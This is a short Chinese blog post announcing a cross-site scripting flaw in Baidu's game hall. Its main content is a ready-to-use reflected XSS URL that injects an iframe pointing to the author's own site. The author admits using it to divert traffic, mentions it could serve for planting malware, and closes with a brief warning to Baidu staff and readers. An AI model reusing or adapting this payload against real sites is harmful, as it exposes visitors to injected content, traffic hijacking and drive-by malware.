今天百度游戏大厅爆出跨站漏洞!并且可以挂马利用···

跨站代码

http://yx.baidu.com/Hall/game/rank_fxq.asp?nick=%3E%3C/a%3E%3Ciframe%20src=%22http://www.kainy.cn%22%20width=500%20height=600%3E%3C/iframe%3E%3Ca%20href

效果图:

Kainy自认为是小人,利用本漏洞给小站带来些许热闹,嘿嘿。。。

不过话说回来,骗点流量还算厚道了,没给你添个挂马的页面,呼呼。。。 百度工作人员要注意啦。。 大家今后面对链接也要注意咯,别看是大站点的就放松了警惕哦~!